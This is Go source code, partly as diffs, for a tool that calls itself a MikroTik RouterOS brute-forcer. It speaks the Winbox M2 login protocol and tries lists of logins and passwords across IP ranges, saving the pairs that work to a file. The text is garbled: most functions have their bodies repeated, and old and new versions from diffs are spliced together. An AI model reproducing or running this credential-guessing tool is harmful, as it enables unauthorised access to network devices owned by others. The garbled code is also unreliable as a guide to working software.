type M2Hash string
func NewM2Message() *M2Message {
m2 := M2Message{}
return &m2
m2 := M2Message{}
return &m2
}
func (m2 *M2Message) Clear() {
m2.el = []M2Element{}
m2.el = []M2Element{}
}
func (m2 *M2Message) Append(code int, value interface{}) {
if m2.el == nil {
m2.Clear()
}
m2.el = append(m2.el, M2Element{code: code, value: value})
if m2.el == nil {
m2.Clear()
}
m2.el = append(m2.el, M2Element{code: code, value: value})
}
func (m2 *M2Message) AppendElement(el *M2Element) {
if m2.el == nil {
m2.Clear()
}
m2.el = append(m2.el, *el)
if m2.el == nil {
m2.Clear()
}
m2.el = append(m2.el, *el)
}
func (m2 *M2Message) Bytes() []byte {
res := []byte{}
for _, el := range m2.el {
buf := new(bytes.Buffer)
binary.Write(buf, binary.LittleEndian, uint16(el.code))
binary.Write(buf, binary.LittleEndian, byte(el.code >> 16))
switch v := el.value.(type) {
case bool:
binary.Write(buf, binary.LittleEndian, v)
case byte:
binary.Write(buf, binary.LittleEndian, byte(MT_BYTE))
binary.Write(buf, binary.LittleEndian, v)
case int:
binary.Write(buf, binary.LittleEndian, byte(MT_DWORD))
binary.Write(buf, binary.LittleEndian, int32(v))
case uint:
binary.Write(buf, binary.LittleEndian, byte(MT_DWORD))
binary.Write(buf, binary.LittleEndian, uint32(v))
case string:
binary.Write(buf, binary.LittleEndian, byte(MT_STRING))
binary.Write(buf, binary.LittleEndian, byte(len(v)))
binary.Write(buf, binary.LittleEndian, []byte(v))
case M2Hash:
binary.Write(buf, binary.LittleEndian, byte(MT_HASH))
binary.Write(buf, binary.LittleEndian, byte(len(v)))
binary.Write(buf, binary.LittleEndian, []byte(v))
case []byte:
binary.Write(buf, binary.LittleEndian, byte(MT_ARRAY))
binary.Write(buf, binary.LittleEndian, uint16(len(v)))
for _, i := range v {
binary.Write(buf, binary.LittleEndian, int32(i))
}
case []int:
binary.Write(buf, binary.LittleEndian, byte(MT_ARRAY))
binary.Write(buf, binary.LittleEndian, uint16(len(v)))
for _, i := range v {
binary.Write(buf, binary.LittleEndian, int32(i))
}
}
res = append(res, buf.Bytes()...)
}
header := make([]byte, 6)
header[0] = byte(len(res) + 4)
header[1] = 0x01
header[2] = 0x00
header[3] = byte(len(res) + 2)
header[4] = 0x4D
header[5] = 0x32
return append(header, res...)
res := []byte{}
for _, el := range m2.el {
buf := new(bytes.Buffer)
binary.Write(buf, binary.LittleEndian, uint16(el.code))
binary.Write(buf, binary.LittleEndian, byte(el.code>>16))
switch v := el.value.(type) {
case bool:
binary.Write(buf, binary.LittleEndian, v)
case byte:
binary.Write(buf, binary.LittleEndian, byte(MT_BYTE))
binary.Write(buf, binary.LittleEndian, v)
case int:
binary.Write(buf, binary.LittleEndian, byte(MT_DWORD))
binary.Write(buf, binary.LittleEndian, int32(v))
case uint:
binary.Write(buf, binary.LittleEndian, byte(MT_DWORD))
binary.Write(buf, binary.LittleEndian, uint32(v))
case string:
binary.Write(buf, binary.LittleEndian, byte(MT_STRING))
binary.Write(buf, binary.LittleEndian, byte(len(v)))
binary.Write(buf, binary.LittleEndian, []byte(v))
case M2Hash:
binary.Write(buf, binary.LittleEndian, byte(MT_HASH))
binary.Write(buf, binary.LittleEndian, byte(len(v)))
binary.Write(buf, binary.LittleEndian, []byte(v))
case []byte:
binary.Write(buf, binary.LittleEndian, byte(MT_ARRAY))
binary.Write(buf, binary.LittleEndian, uint16(len(v)))
for _, i := range v {
binary.Write(buf, binary.LittleEndian, int32(i))
}
case []int:
binary.Write(buf, binary.LittleEndian, byte(MT_ARRAY))
binary.Write(buf, binary.LittleEndian, uint16(len(v)))
for _, i := range v {
binary.Write(buf, binary.LittleEndian, int32(i))
}
}
res = append(res, buf.Bytes()...)
}
header := make([]byte, 6)
header[0] = byte(len(res) + 4)
header[1] = 0x01
header[2] = 0x00
header[3] = byte(len(res) + 2)
header[4] = 0x4D
header[5] = 0x32
return append(header, res...)
}
func (m2 *M2Message) ParseM2Element(buf io.Reader) error {
var codeAndType uint32
err := binary.Read(buf, binary.LittleEndian, &codeAndType)
if err != nil {
return err
}
el := M2Element{code: int(codeAndType & 0x00FFFFFF)}
keyType := byte(codeAndType >> 24)
log("lw", 3, "m2 code=%v type=%v", el.code, keyType)
switch keyType {
case MT_BOOL_FALSE, MT_BOOL_TRUE:
el.value = keyType == MT_BOOL_TRUE
log("lw", 3, "m2 MT_BOOL: %v", el.value.(bool))
case MT_BYTE:
var b byte
err = binary.Read(buf, binary.LittleEndian, &b)
el.value = b
log("lw", 3, "m2 MT_BYTE: %v", el.value.(byte))
case MT_DWORD:
var b int32
err = binary.Read(buf, binary.LittleEndian, &b)
el.value = b
log("lw", 3, "m2 MT_DWORD: %v", el.value.(int32))
case MT_STRING:
var length byte
err = binary.Read(buf, binary.LittleEndian, &length)
if err != nil {
return err
}
bs := make([]byte, length)
_, err = io.ReadFull(buf, bs)
el.value = string(bs)
log("lw", 3, "m2 MT_STRING (len %v): %v", length, el.value.(string))
case MT_HASH:
var length byte
err = binary.Read(buf, binary.LittleEndian, &length)
if err != nil {
return err
}
bs := make([]byte, length)
_, err = io.ReadFull(buf, bs)
el.value = M2Hash(bs)
log("lw", 3, "m2 MT_HASH (len %v): %v", length, []byte(el.value.(M2Hash)))
case MT_ARRAY:
var length uint16
err = binary.Read(buf, binary.LittleEndian, &length)
if err != nil {
return err
}
sl := []int{}
for i := 0; i < int(length); i++ {
var el2 int32
err = binary.Read(buf, binary.LittleEndian, &el2)
if err != nil {
break
}
sl = append(sl, int(el2))
}
el.value = sl
log("lw", 3, "m2 MT_HASH (len %v): %v", length, el.value.([]int))
default:
return errors.New("unknown key code " + strconv.Itoa(int(keyType)))
}
if err != nil {
return err
}
m2.el = append(m2.el, el)
return nil
var codeAndType uint32
err := binary.Read(buf, binary.LittleEndian, &codeAndType)
if err != nil {
return err
}
el := M2Element{code: int(codeAndType & 0x00FFFFFF)}
keyType := byte(codeAndType >> 24)
log("lw", 3, "m2 code=%v type=%v", el.code, keyType)
switch keyType {
case MT_BOOL_FALSE, MT_BOOL_TRUE:
el.value = keyType == MT_BOOL_TRUE
log("lw", 3, "m2 MT_BOOL: %v", el.value.(bool))
case MT_BYTE:
var b byte
err = binary.Read(buf, binary.LittleEndian, &b)
el.value = b
log("lw", 3, "m2 MT_BYTE: %v", el.value.(byte))
case MT_DWORD:
var b int32
err = binary.Read(buf, binary.LittleEndian, &b)
el.value = b
log("lw", 3, "m2 MT_DWORD: %v", el.value.(int32))
case MT_STRING:
var length byte
err = binary.Read(buf, binary.LittleEndian, &length)
if err != nil {
return err
}
bs := make([]byte, length)
_, err = io.ReadFull(buf, bs)
el.value = string(bs)
log("lw", 3, "m2 MT_STRING (len %v): %v", length, el.value.(string))
case MT_HASH:
var length byte
err = binary.Read(buf, binary.LittleEndian, &length)
if err != nil {
return err
}
bs := make([]byte, length)
_, err = io.ReadFull(buf, bs)
el.value = M2Hash(bs)
log("lw", 3, "m2 MT_HASH (len %v): %v", length, []byte(el.value.(M2Hash)))
case MT_ARRAY:
var length uint16
err = binary.Read(buf, binary.LittleEndian, &length)
if err != nil {
return err
}
sl := []int{}
for i := 0; i < int(length); i++ {
var el2 int32
err = binary.Read(buf, binary.LittleEndian, &el2)
if err != nil {
break
}
sl = append(sl, int(el2))
}
el.value = sl
log("lw", 3, "m2 MT_HASH (len %v): %v", length, el.value.([]int))
default:
return errors.New("unknown key code " + strconv.Itoa(int(keyType)))
}
if err != nil {
return err
}
m2.el = append(m2.el, el)
return nil
}
func (m2 *M2Message) ParseM2Message(buf io.Reader) error {
var headerBlockSize, m2BlockSize byte
var m2Extra, m2Header uint16
err := binary.Read(buf, binary.LittleEndian, &headerBlockSize)
err = binary.Read(buf, binary.LittleEndian, &m2Extra)
err = binary.Read(buf, binary.LittleEndian, &m2BlockSize)
err = binary.Read(buf, binary.LittleEndian, &m2Header)
if err != nil {
return err
}
if m2Extra != 0x1 {
return errors.New("invalid M2_EXTRA")
}
if m2Header != 0x324D {
return errors.New("invalid M2_HEADER")
}
for {
log("lw", 3, "parsing new m2 element")
err := m2.ParseM2Element(buf)
if err != nil {
return err
}
}
var headerBlockSize, m2BlockSize byte
var m2Extra, m2Header uint16
err := binary.Read(buf, binary.LittleEndian, &headerBlockSize)
err = binary.Read(buf, binary.LittleEndian, &m2Extra)
err = binary.Read(buf, binary.LittleEndian, &m2BlockSize)
err = binary.Read(buf, binary.LittleEndian, &m2Header)
if err != nil {
return err
}
if m2Extra != 0x1 {
return errors.New("invalid M2_EXTRA")
}
if m2Header != 0x324D {
return errors.New("invalid M2_HEADER")
}
for {
log("lw", 3, "parsing new m2 element")
err := m2.ParseM2Element(buf)
if err != nil {
return err
}
}
}
func ParseM2Messages(src []byte) (messages []M2Message, err error) {
messages = []M2Message{}
messages = []M2Message{}
buf := bytes.NewReader(src)
for {
m2 := NewM2Message()
err := m2.ParseM2Message(buf)
if err == io.EOF {
messages = append(messages, *m2)
break
} else if err != nil {
return nil, err
} else {
messages = append(messages, *m2)
}
}
log("lw", 3, "m2 eof after %v messages", len(messages))
return messages, nil
for {
m2 := NewM2Message()
err := m2.ParseM2Message(buf)
if err == io.EOF {
messages = append(messages, *m2)
break
} else if err != nil {
return nil, err
} else {
messages = append(messages, *m2)
}
}
log("lw", 3, "m2 eof after %v messages", len(messages))
return messages, nil
}
type LegacyWinbox struct {
task *Task
stage int
m2 []M2Message
task *Task
conn *Connection
stage int
m2 []M2Message
}
func NewLegacyWinbox(task *Task) *LegacyWinbox {
lw := LegacyWinbox{task: task, stage: -1, m2: []M2Message{}}
return &lw
func NewLegacyWinbox(task *Task, conn *Connection) *LegacyWinbox {
lw := LegacyWinbox{task: task, conn: conn, stage: -1, m2: []M2Message{}}
return &lw
}
// req1
func (lw *LegacyWinbox) MTReqList() []byte {
m2 := NewM2Message()
m2.Append(MT_RECEIVER, []byte{2, 2})
m2.Append(MT_COMMAND, byte(7))
m2.Append(MT_REQUEST_ID, byte(1))
m2.Append(MT_REPLY_EXPECTED, true)
m2.Append(1, "list")
return m2.Bytes()
m2 := NewM2Message()
m2.Append(MT_RECEIVER, []byte{2, 2})
m2.Append(MT_COMMAND, byte(7))
m2.Append(MT_REQUEST_ID, byte(1))
m2.Append(MT_REPLY_EXPECTED, true)
m2.Append(1, "list")
return m2.Bytes()
}
// res1
func (lw *LegacyWinbox) MTGetSid(m2 []M2Message) *M2Element {
for _, msg := range m2 {
for _, el := range msg.el {
if el.code == 0xFE0001 {
return &el
}
}
}
return nil
for _, msg := range m2 {
for _, el := range msg.el {
if el.code == 0xFE0001 {
return &el
}
}
}
return nil
}
// req2
func (lw *LegacyWinbox) MTReqChallenge(sid *M2Element) []byte {
m2 := NewM2Message()
m2.Append(MT_RECEIVER, []byte{13, 4})
m2.Append(MT_COMMAND, byte(4))
m2.Append(MT_REQUEST_ID, byte(2))
m2.AppendElement(sid)
m2.Append(MT_REPLY_EXPECTED, true)
return m2.Bytes()
m2 := NewM2Message()
m2.Append(MT_RECEIVER, []byte{13, 4})
m2.Append(MT_COMMAND, byte(4))
m2.Append(MT_REQUEST_ID, byte(2))
m2.AppendElement(sid)
m2.Append(MT_REPLY_EXPECTED, true)
return m2.Bytes()
}
// res2
func (lw *LegacyWinbox) MTGetSalt(m2 []M2Message) M2Hash {
for _, msg := range m2 {
for _, el := range msg.el {
if el.code == 0x9 {
return el.value.(M2Hash)
}
}
}
return ""
for _, msg := range m2 {
for _, el := range msg.el {
if el.code == 0x9 {
return el.value.(M2Hash)
}
}
}
return ""
}
// req3
func (lw *LegacyWinbox) MTReqAuth(sid *M2Element, login, digest, salt string) []byte {
m2 := NewM2Message()
m2.Append(MT_RECEIVER, []byte{13, 4})
m2.Append(MT_COMMAND, byte(1))
m2.Append(MT_REQUEST_ID, byte(3))
m2.AppendElement(sid)
m2.Append(MT_REPLY_EXPECTED, true)
m2.Append(1, login)
m2.Append(9, M2Hash(salt))
m2.Append(10, M2Hash(digest))
return m2.Bytes()
m2 := NewM2Message()
m2.Append(MT_RECEIVER, []byte{13, 4})
m2.Append(MT_COMMAND, byte(1))
m2.Append(MT_REQUEST_ID, byte(3))
m2.AppendElement(sid)
m2.Append(MT_REPLY_EXPECTED, true)
m2.Append(1, login)
m2.Append(9, M2Hash(salt))
m2.Append(10, M2Hash(digest))
return m2.Bytes()
}
// res3
func (lw *LegacyWinbox) MTGetResult(m2 []M2Message) (res bool, err error) {
for _, msg := range m2 {
for _, el := range msg.el {
if el.code == 0xA {
_, ok := el.value.(M2Hash)
if ok {
return true, nil
}
} else if el.code == 0xFF0008 {
v, ok := el.value.(int32)
if ok && v == 0xFE0006 {
return false, nil
}
}
}
}
return false, errors.New("no auth marker found")
for _, msg := range m2 {
for _, el := range msg.el {
if el.code == 0xA {
_, ok := el.value.(M2Hash)
if ok {
return true, nil
}
} else if el.code == 0xFF0008 {
v, ok := el.value.(int32)
if ok && v == 0xFE0006 {
return false, nil
}
}
}
}
return false, errors.New("no auth marker found")
}
func (lw *LegacyWinbox) SendRecv(buf []byte) (res []byte, err error) {
_, err = lw.task.conn.Write(buf)
if err != nil {
log("lw", 1, "failed to send: %v", err.Error())
return nil, err
}
resp := make([]byte, 1024)
n, err := lw.task.conn.Read(resp)
if err != nil {
log("lw", 1, "failed to recv: %v", err.Error())
return nil, err
}
return resp[:n], nil
err = lw.conn.Send(buf)
if err != nil {
log("lw", 1, "failed to send: %v", err.Error())
return nil, err
}
resp, err := lw.conn.Recv()
if err != nil {
log("lw", 1, "failed to recv: %v", err.Error())
return nil, err
}
return resp, nil
}
func (lw *LegacyWinbox) TryLogin() (res bool, err error) {
log("lw", 2, "login: stage 1, req_list")
r1, err := lw.SendRecv(lw.MTReqList())
if err != nil {
return false, err
}
log("lw", 2, "login: stage 2, got response for req_list")
msg, err := ParseM2Messages(r1)
if err != nil {
return false, err
}
sid := lw.MTGetSid(msg)
if sid == nil {
return false, errors.New("failed to get SID from stage 2")
}
log("lw", 2, "login: stage 2, sid %v", sid.String())
r2, err := lw.SendRecv(lw.MTReqChallenge(sid))
if err != nil {
return false, err
}
log("lw", 2, "login: stage 3, got response for req_challenge")
log("lw", 2, "r2: %v", r2)
msg, err = ParseM2Messages(r2)
if err != nil {
return false, err
}
salt := lw.MTGetSalt(msg)
if salt == "" {
return false, errors.New("failed to get salt from stage 3")
}
sl := []byte{0}
sl = append(sl, []byte(lw.task.password)...)
sl = append(sl, []byte(salt)...)
d := md5.Sum(sl)
digest := append([]byte{0}, d[:]...)
log("lw", 2, "login: stage 3, hash %v", digest)
r3, err := lw.SendRecv(lw.MTReqAuth(sid, lw.task.login, string(digest), string(salt)))
if err != nil {
return false, err
}
log("lw", 2, "login: stage 4, got response for req_salt")
msg, err = ParseM2Messages(r3)
if err != nil {
return false, err
}
res, err = lw.MTGetResult(msg)
log("lw", 2, "login: stage 5: res=%v err=%v", res, err)
return res, err
log("lw", 2, "login: stage 1, req_list")
r1, err := lw.SendRecv(lw.MTReqList())
if err != nil {
return false, err
}
log("lw", 2, "login: stage 2, got response for req_list")
msg, err := ParseM2Messages(r1)
if err != nil {
return false, err
}
sid := lw.MTGetSid(msg)
if sid == nil {
return false, errors.New("failed to get SID from stage 2")
}
log("lw", 2, "login: stage 2, sid %v", sid.String())
r2, err := lw.SendRecv(lw.MTReqChallenge(sid))
if err != nil {
return false, err
}
log("lw", 2, "login: stage 3, got response for req_challenge")
log("lw", 2, "r2: %v", r2)
msg, err = ParseM2Messages(r2)
if err != nil {
return false, err
}
salt := lw.MTGetSalt(msg)
if salt == "" {
return false, errors.New("failed to get salt from stage 3")
}
sl := []byte{0}
sl = append(sl, []byte(lw.task.password)...)
sl = append(sl, []byte(salt)...)
d := md5.Sum(sl)
digest := append([]byte{0}, d[:]...)
log("lw", 2, "login: stage 3, hash %v", digest)
r3, err := lw.SendRecv(lw.MTReqAuth(sid, lw.task.login, string(digest), string(salt)))
if err != nil {
return false, err
}
log("lw", 2, "login: stage 4, got response for req_salt")
msg, err = ParseM2Messages(r3)
if err != nil {
return false, err
}
res, err = lw.MTGetResult(msg)
log("lw", 2, "login: stage 5: res=%v err=%v", res, err)
return res, err
}

@ -1,13 +1,22 @@
package main
// log.go: logging
import (
"fmt"
"os"
"strings"
)
func init() {
registerParam("log-level", 0, "max log level, useful for debugging. -1 logs everything")
registerParamWithCallback("log-modules", []string{}, "always log output from these modules", updateModuleMap)
registerParamWithCallback("no-log-modules", []string{}, "never log output from these modules", updateModuleMap)
registerParamHidden("log-module-map", map[string]bool{})
}
func shouldLog(facility string, level, maxLevel int) bool {
moduleMap := CfgGet("log-module-map").(map[string]bool)
moduleMap := getParam[map[string]bool]("log-module-map")
logModule, ok := moduleMap[strings.ToLower(facility)]
if ok {
@ -22,7 +31,7 @@ func shouldLog(facility string, level, maxLevel int) bool {
}
func log(facility string, level int, s string, params ...interface{}) {
maxLevel := CfgGetInt("log-level")
maxLevel := getParamInt("log-level")
if !shouldLog(facility, level, maxLevel) {
return
}
@ -64,8 +73,8 @@ func failIf(condition bool, s string, params ...interface{}) {
}
func updateModuleMap() {
logModules := CfgGet("log-modules").([]string)
noLogModules := CfgGet("no-log-modules").([]string)
logModules := getParamStringSlice("log-modules")
noLogModules := getParamStringSlice("no-log-modules")
newMap := map[string]bool{}
@ -76,16 +85,9 @@ func updateModuleMap() {
for _, module := range noLogModules {
module = strings.ToLower(module)
failIf(newMap[module] == true, "log module \"%v\" is defined both in log-modules and no-log-modules", module)
failIf(newMap[module], "log module \"%v\" is defined both in log-modules and no-log-modules", module)
newMap[module] = false
}
CfgSet("log-module-map", newMap)
}
func init() {
CfgRegister("log-level", 0, "max log level, useful for debugging. -1 logs everything")
CfgRegisterCallback("log-modules", []string{}, "always log output from these modules", updateModuleMap)
CfgRegisterCallback("no-log-modules", []string{}, "never log output from these modules", updateModuleMap)
CfgRegisterHidden("log-module-map", map[string]bool{})
setParam("log-module-map", newMap)
}

@ -1,7 +1,8 @@
package main
// math.go: mathematical routines
import (
_ "fmt"
"math"
)

@ -4,13 +4,13 @@ func main() {
log("main", 0, "mtbf: Mikrotik RouterOS bruteforce | v1.0.1")
parseAppConfig()
OpenOutFile()
defer CloseOutFile()
go ResultService()
defer EndResults()
LoadSources()
defer CloseSources()
wg := InitializeThreads()
WaitForThreads(wg)
ThreadService()
log("main", 0, "finished")
}

@ -1,25 +1,50 @@
package main
// results.go: saves good results to a file or console
import (
"fmt"
"os"
)
func init() {
registerParam("out-file", "good.txt", "results will be saved in this file")
registerAlias("o", "out-file")
}
var outFile *os.File
var resultChannel chan *Task
func ResultService() {
openResultFile()
defer closeResultFile()
func RegisterResult(t *Task, good bool) {
if good {
log("res", 0, "****************\n******** OK: %v %v %v\n****************", t.e.String(), t.login, t.password)
resultChannel = make(chan *Task, 128)
for task := range resultChannel {
if outFile != nil {
fmt.Fprintf(outFile, "%v\t%v\t%v\n", t.e.String(), t.login, t.password)
fmt.Fprintf(outFile, "%v\n", task.String())
}
}
}
func RegisterResult(task *Task, good bool) {
if !good {
log("res", 1, "bad: %v", task.String())
} else {
log("res", 1, "bad: %v %v %v", t.e.String(), t.login, t.password)
log("res", 0, "good: %v", task.String())
if outFile != nil {
resultChannel <- task
}
}
}
func OpenOutFile() {
fileName := CfgGetString("out-file")
func EndResults() {
close(resultChannel)
}
func openResultFile() {
fileName := getParamString("out-file")
if fileName == "" {
log("out", 0, "WARNING: out-file is not specified, results will only be logged in console")
outFile = nil
@ -28,19 +53,17 @@ func OpenOutFile() {
outFile, err = os.OpenFile(fileName, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644)
if err != nil {
fail("error opening output file \"%v\": %v", fileName, err.Error())
fail("error opening result file \"%v\": %v", fileName, err.Error())
}
log("out", 2, "opened output file \"%v\"", fileName)
log("out", 2, "opened result file \"%v\"", fileName)
}
}
func CloseOutFile() {
outFile.Close()
outFile = nil
}
func init() {
CfgRegister("out-file", "good.txt", "results will be saved in this file")
CfgRegisterAlias("o", "out-file")
func closeResultFile() {
if outFile != nil {
outFile.Close()
outFile = nil
log("out", 2, "closed result file")
}
}

@ -2,12 +2,11 @@ package main
import (
"errors"
"net"
)
// TODO: multiple services...
func TryLogin(task *Task, conn net.Conn) (res bool, err error) {
func TryLogin(task *Task, conn *Connection) (res bool, err error) {
defer func() {
if r := recover(); r != nil {
log("srv", 1, "fatal error (panic) in service handler: %v", r)

@ -8,64 +8,114 @@ import (
"sync"
)
type Source struct {
name string // name of this source
// SrcIP, SrcLogin and SrcPassword represent different source types.
var SrcIP Source = Source{name: "ip", plainParmName: "ip", filesParmName: "ip-file"}
var SrcLogin Source = Source{name: "login", plainParmName: "login", filesParmName: "login-file"}
var SrcPassword Source = Source{name: "password", plainParmName: "password",
filesParmName: "password-file", transform: func(item string) (res string, err error) {
if getParamSwitch("no-password-trim") {
return item, nil
} else {
return strings.TrimSpace(item), nil
}
}}
plain []string // sources from commandline
contents []string // sources from files
func init() {
registerParam("ip", []string{}, "IPs or subnets in CIDR notation")
registerParam("ip-file", []string{}, "paths to files with IPs or subnets in CIDR notation (one entry per line)")
registerParam("login", []string{}, "one or more logins")
registerParam("login-file", []string{}, "paths to files with logins (one entry per line)")
registerParam("password", []string{}, "one or more passwords")
registerParam("password-file", []string{}, "paths to files with passwords (one entry per line)")
files []*os.File // file pointers
fileNames []string // file names
plainParmName string // name of "plain" commandline parameter
filesParmName string // name of "files" commandline parameter
registerSwitch("add-empty-password", "insert an empty password to the password list")
registerSwitch("no-password-trim", "preserve leading and trailing spaces in passwords")
registerSwitch("logins-first", "increment logins before passwords")
registerSwitch("file-contents-first", "try to go through source files first, defer commandline args for later")
}
transform func(item string) (string, error) // optional transformation function
// LoadSources loads contents for all sources.
func LoadSources() {
log("src", 1, "loading sources")
fetchMutex sync.Mutex // sync mutex
}
var wg sync.WaitGroup
wg.Add(3)
go SrcIP.LoadSource(&wg)
go SrcLogin.LoadSource(&wg)
go SrcPassword.LoadSource(&wg)
wg.Wait()
// both -1: exhausted
// both 0: not started yet
type SourcePos struct {
plainIdx int
contentIdx int
}
SrcIP.ReportLoaded()
SrcLogin.ReportLoaded()
SrcPassword.ReportLoaded()
// String converts a SourcePos to its string representation.
func (pos *SourcePos) String() string {
return "P" + strconv.Itoa(pos.plainIdx) + "/C" + strconv.Itoa(pos.contentIdx)
ParseEndpoints(SrcIP.plain)
ParseEndpoints(SrcIP.contents)
log("src", 1, "ok: finished loading sources")
}
// Exhausted checks if a SourcePos can no longer produce any sources.
func (pos *SourcePos) Exhausted() bool {
return pos.plainIdx == -1 && pos.contentIdx == -1
// CloseSources closes all source files.
func CloseSources() {
log("src", 1, "closing sources")
SrcIP.CloseSource()
SrcLogin.CloseSource()
SrcPassword.CloseSource()
log("src", 1, "ok: finished closing sources")
}
// Reset moves a SourcePos to its starting position.
func (pos *SourcePos) Reset() {
pos.plainIdx = 0
pos.contentIdx = 0
log("src", 3, "resetting source pos")
// LoadSource fills a Source with data (from commandline and from files).
func (src *Source) LoadSource(wg *sync.WaitGroup) {
if wg != nil {
defer wg.Done()
}
if src.name == "password" && getParamSwitch("add-empty-password") {
src.plain = append(src.plain, "")
}
src.ParsePlain()
src.OpenFiles()
defer src.CloseSource()
src.ParseFiles()
failIf(len(src.contents)+len(src.plain) == 0, "no %vs defined: check %v and %v parameters", src, src.plainParmName, src.filesParmName)
}
// passwordTransform is a transformation function for a password.
func passwordTransform(item string) (res string, err error) {
if getParamSwitch("no-password-trim") {
return item, nil
} else {
return strings.TrimSpace(item), nil
// CloseSource closes all files for a Source.
func (src *Source) CloseSource() {
l := len(src.files)
for _, file := range src.files {
if file != nil {
file.Close()
}
}
src.files = nil
src.fileNames = nil
log("src", 1, "closed all %v %v files", l, src)
}
// SrcIP, SrcLogin and SrcPassword represent different sources.
var SrcIP Source = Source{name: "ip", plainParmName: "ip", filesParmName: "ip-file"}
var SrcLogin Source = Source{name: "login", plainParmName: "login", filesParmName: "login-file"}
var SrcPassword Source = Source{name: "password", plainParmName: "password",
filesParmName: "password-file", transform: passwordTransform}
// OpenFiles opens all files for a Source.
func (src *Source) OpenFiles() {
fileNames := getParamStringSlice(src.filesParmName)
// String converts a Source to its string representation.
func (src *Source) String() string {
return src.name
for _, fileName := range fileNames {
f, err := os.Open(fileName)
if err != nil {
fail("error opening source file \"%v\": %v", fileName, err.Error())
}
src.files = append(src.files, f)
src.fileNames = append(src.fileNames, fileName)
}
if len(src.files) > 0 {
log("src", 1, "opened %v %v files", len(src.files), src)
}
}
// ValidateAndTransformItem attempts to validate a source item
@ -84,51 +134,6 @@ func (src *Source) ValidateAndTransformItem(item string) (res string, err error)
}
}
// FetchFromSlice retrieves an item from a string slice and optionally increments its current position.
func (src *Source) FetchFromSlice(name string, idx *int, slice []string, inc bool) (res string, empty bool) {
if *idx == -1 { // exhausted
log("src", 5, "fetch %v from %v: idx is -1, return empty", src, name)
return "", true
}
if *idx >= len(slice) {
log("src", 5, "fetch %v from %v: idx >= slice length (%v >= %v), marking as exhausted, return empty", src, name, *idx, len(slice))
*idx = -1
return "", true
}
res = slice[*idx]
log("src", 5, "fetch %v from %v: ok, got %v at idx %v", src, name, res, *idx)
if inc {
*idx = *idx + 1
log("src", 5, "fetch %v from %v: incrementing idx to %v", src, name, *idx)
}
return res, false
}
// FetchOne retrieves an item from a Source with a specified SourcePos.
func (src *Source) FetchOne(pos *SourcePos, inc bool) (res string, empty bool) {
src.fetchMutex.Lock()
defer src.fetchMutex.Unlock()
if getParamSwitch("file-contents-first") {
res, empty = src.FetchFromSlice("contents", &pos.contentIdx, src.contents, inc)
if empty {
res, empty = src.FetchFromSlice("plain", &pos.plainIdx, src.plain, inc)
}
} else {
res, empty = src.FetchFromSlice("plain", &pos.plainIdx, src.plain, inc)
if empty {
res, empty = src.FetchFromSlice("contents", &pos.contentIdx, src.contents, inc)
}
}
logIf(empty, "src", 2, "exhausted source %v for pos %v", src, pos.String())
return res, empty
}
// ParsePlain parses commandline parameters for a Source.
func (src *Source) ParsePlain() {
for _, plain := range getParamStringSlice(src.plainParmName) {
@ -145,26 +150,7 @@ func (src *Source) ParsePlain() {
}
}
// OpenFiles opens all files for a Source.
func (src *Source) OpenFiles() {
fileNames := getParamStringSlice(src.filesParmName)
for _, fileName := range fileNames {
f, err := os.Open(fileName)
if err != nil {
fail("error opening source file \"%v\": %v", fileName, err.Error())
}
src.files = append(src.files, f)
src.fileNames = append(src.fileNames, fileName)
}
if len(src.files) > 0 {
log("src", 1, "opened %v %v files", len(src.files), src)
}
}
// ParseFiles parses all files for a Source.
// ParseFiles parses files for a Source.
func (src *Source) ParseFiles() {
for i, file := range src.files {
fileName := src.fileNames[i]
@ -193,95 +179,101 @@ func (src *Source) ParseFiles() {
}
}
// FailIfEmpty throws an exception if a source is empty.
func (src *Source) FailIfEmpty() {
failIf(len(src.contents)+len(src.plain) == 0, "no %vs defined: check %v and %v parameters", src, src.plainParmName, src.filesParmName)
}
// ReportLoaded prints a console message about the number of loaded items for a Source.
func (src *Source) ReportLoaded() {
log("src", 0, "loaded %vs: %v items from commandline and %v items from files", src, len(src.plain), len(src.contents))
}
// LoadSource fills a Source with data (from commandline and from files).
func (src *Source) LoadSource(wg *sync.WaitGroup) {
if wg != nil {
defer wg.Done()
type Source struct {
name string // name of this source
plain []string // sources from commandline
contents []string // sources from files
files []*os.File // file pointers
fileNames []string // file names
plainParmName string // name of "plain" commandline parameter
filesParmName string // name of "files" commandline parameter
transform func(item string) (string, error) // optional transformation function
fetchMutex sync.Mutex // sync mutex
}
// String converts a Source to its string representation.
func (src *Source) String() string {
return src.name
}
// FetchFromSlice retrieves an item from a string slice and optionally increments its current position.
func (src *Source) FetchFromSlice(name string, idx *int, slice []string, inc bool) (res string, empty bool) {
if *idx == -1 { // exhausted
log("src", 5, "fetch %v from %v: idx is -1, return empty", src, name)
return "", true
}
if src.name == "password" && getParamSwitch("add-empty-password") {
src.plain = append(src.plain, "")
if *idx >= len(slice) {
log("src", 5, "fetch %v from %v: idx >= slice length (%v >= %v), marking as exhausted, return empty", src, name, *idx, len(slice))
*idx = -1
return "", true
}
src.ParsePlain()
res = slice[*idx]
log("src", 5, "fetch %v from %v: ok, got %v at idx %v", src, name, res, *idx)
src.OpenFiles()
defer src.CloseSource()
if inc {
*idx = *idx + 1
log("src", 5, "fetch %v from %v: incrementing idx to %v", src, name, *idx)
}
src.ParseFiles()
src.FailIfEmpty()
return res, false
}
// CloseSource closes all files for a Source.
func (src *Source) CloseSource() {
l := len(src.files)
for _, file := range src.files {
if file != nil {
file.Close()
// FetchOne retrieves an item from a Source with a specified SourcePos.
func (src *Source) FetchOne(pos *SourcePos, inc bool) (res string, empty bool) {
src.fetchMutex.Lock()
defer src.fetchMutex.Unlock()
if getParamSwitch("file-contents-first") {
res, empty = src.FetchFromSlice("contents", &pos.contentIdx, src.contents, inc)
if empty {
res, empty = src.FetchFromSlice("plain", &pos.plainIdx, src.plain, inc)
}
} else {
res, empty = src.FetchFromSlice("plain", &pos.plainIdx, src.plain, inc)
if empty {
res, empty = src.FetchFromSlice("contents", &pos.contentIdx, src.contents, inc)
}
}
src.files = nil
src.fileNames = nil
log("src", 1, "closed all %v %v files", l, src)
logIf(empty, "src", 2, "exhausted source %v for pos %v", src, pos.String())
return res, empty
}
// ---
// ---
// ---
// LoadSources loads contents for all sources, both from commandline and from files.
func LoadSources() {
log("src", 1, "loading sources")
var wg sync.WaitGroup
wg.Add(3)
go SrcIP.LoadSource(&wg)
go SrcLogin.LoadSource(&wg)
go SrcPassword.LoadSource(&wg)
wg.Wait()
SrcIP.ReportLoaded()
SrcLogin.ReportLoaded()
SrcPassword.ReportLoaded()
